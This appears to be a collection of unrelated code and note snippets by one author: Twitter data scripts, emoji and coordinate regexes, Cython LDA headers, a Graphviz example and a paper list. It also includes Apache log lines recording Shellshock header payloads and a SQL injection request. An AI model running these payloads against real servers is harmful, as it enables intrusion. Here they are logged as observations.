r"""
stdin: IDs of tweets to get (whitespace or line separated)
stdout: the tweets as two-column TSV: ID \t TweetJSON
This retrieves tweets using the API.
If there was an error when retrieving a message - most prominently, if the
message is now deleted -- the error information is saved as JSON. Therefore
there should be exactly as many output lines as there are input IDs.
# -*- encoding: utf-8 -*-
# actually that encoding line is NOT important codewise. only for doc purposes.
"""
Detect emoji or other emoji-like things in Python.
The regular expressions here can be used to either identify emoji or to remove it.
The comments are written from the perspective of removing it.
The regexes get some stuff besides emoji.
by Brendan O'Connor (http://brenocon.com) 2016-10-20
originally written as part of https://arxiv.org/abs/1608.08868
# by brendan o'connor (http://brenocon.com) written in early 2012
# parallelized collapsed gibbs sampling for LDA with threads in cython
# need to delete these lines to get the cython instructions to work...
#cython: boundscheck=False, cdivision=True
# vim:sts=4:sw=4
import numpy as np
cimport numpy as np
cimport cython
cimport openmp
For example for data looking like
qwerasdvzxcasdf 0.62s user 18.55s system 92% cpu 20.678 total
asdfasdf 838.56s user 10.75s system 100% cpu 14:08.98 total
acvzxcvzxcv 3:15:12.2 total
asdfadsf 0.22s user 6.24s system 0% cpu 16:01.30 total
output those 4 numbers in seconds
20.678
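The conversion described above can be sketched in Python. This is only an illustration, not the original script: the names `TOTAL_RE` and `total_seconds` are hypothetical, and it assumes the elapsed time is always the field directly before the word `total`, written as seconds, `MM:SS` or `H:MM:SS` with an optional fraction.

```python
import re

# Elapsed-time field directly before the word "total",
# e.g. "20.678", "14:08.98" or "3:15:12.2".
TOTAL_RE = re.compile(r'(\d+(?::\d+){0,2}(?:\.\d+)?)\s+total')

def total_seconds(line):
    """Return the 'total' elapsed time of one line in seconds, or None."""
    m = TOTAL_RE.search(line)
    if m is None:
        return None
    seconds = 0.0
    # Fold the colon-separated parts left to right: each step shifts the
    # running value up by one base-60 position and adds the next part.
    for part in m.group(1).split(':'):
        seconds = seconds * 60 + float(part)
    return seconds
```

For the four sample lines this gives roughly 20.678, 848.98, 11712.2 and 961.3 seconds. Lines without a recognizable `total` field return `None` rather than raising, so the caller can decide whether to skip or report them.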
#!/usr/bin/env python
import sys,os,re,json
from hose_util import iterate, lookup
# import geodb
# country_db = geodb.GeoDB.load_geojson_files(['/home/brenocon/geocode/tm_world_borders-0.3.json'])
OneCoord = r'([-+]?\d{1,3}\.\d{3,})'
Separator= r', ?'
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U)
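
A minimal sketch of how the `LatLong` pattern above might be applied to a free-text field. The preview is cut off before the script uses the pattern, so the helper `find_latlong` is hypothetical and not part of the original file. The three pattern definitions are repeated so the example runs on its own.

```python
import re

# Patterns as defined in the snippet above.
OneCoord = r'([-+]?\d{1,3}\.\d{3,})'
Separator = r', ?'
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U)

def find_latlong(text):
    """Hypothetical helper: return the first (lat, lon) pair as floats, or None."""
    m = LatLong.search(text)
    if m is None:
        return None
    return float(m.group(1)), float(m.group(2))
```

Because `OneCoord` requires at least three digits after the decimal point, a string such as `40.7, -74.0` does not match, while `40.7128,-74.0060` does. The pattern does not check that the values fall within valid latitude and longitude ranges.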
#!/usr/bin/env python
import ujson as json
import time,sys
from datetime import datetime
def parse_date(twitter_lame_datetime_string):
    # e.g. the 'created_at' field
    ts = time.strptime(twitter_lame_datetime_string, "%a %b %d %H:%M:%S +0000 %Y")
    # first six fields are year..second; ts[6] is the weekday, not microseconds
    return datetime(*ts[:6])
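
`parse_date` above returns a naive `datetime` and hard-codes the `+0000` offset in the format string. As an alternative sketch (not the author's method), assuming Python 3 and the default C/English locale for the day and month names, `datetime.strptime` with `%z` parses the offset and returns a timezone-aware value. The name `parse_date_aware` is hypothetical.

```python
from datetime import datetime, timezone

def parse_date_aware(created_at):
    """Parse a Twitter-style 'created_at' string into an aware UTC datetime."""
    # %z reads the numeric offset (e.g. +0000) instead of matching it literally.
    dt = datetime.strptime(created_at, "%a %b %d %H:%M:%S %z %Y")
    # Normalize to UTC in case a non-zero offset ever appears.
    return dt.astimezone(timezone.utc)
```

An aware result can be compared with other aware timestamps without guessing which zone a naive value was meant to be in.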
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts.
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
114.91.105.103 - -
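
A plain `grep '()'` also matches lines that merely contain an empty pair of parentheses, such as the `version()` call in the SQL injection request above. A narrower filter, sketched here as an assumption about what is worth flagging rather than the method used to collect these lines, looks for the `() { :; };` function-definition prefix. The names `SHELLSHOCK_RE` and `is_shellshock_probe` are hypothetical.

```python
import re

# "() { :; };" with flexible whitespace, as seen in the header fields above.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:\s*;\s*\}\s*;')

def is_shellshock_probe(log_line):
    """Return True if the log line contains the '() { :; };' prefix."""
    return SHELLSHOCK_RE.search(log_line) is not None
```

This only covers the `:;` no-op body seen in these logs; payloads that use a different function body would need a looser pattern.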
~ % cat bla
digraph A {
0 [label = "hello\\"]
}
~ % dot -Tpdf bla > out.pdf
===> http://brenocon.com/20141005_dot.pdf
NLP and source code papers, very scattered and partial listing
(collected by Nathan Schneider and Brendan O'Connor)
ICML 2014
Maddison and Tarlow
Structured Generative Models of Natural Source Code
http://jmlr.org/proceedings/papers/v32/maddison14.pdf
ACL 2013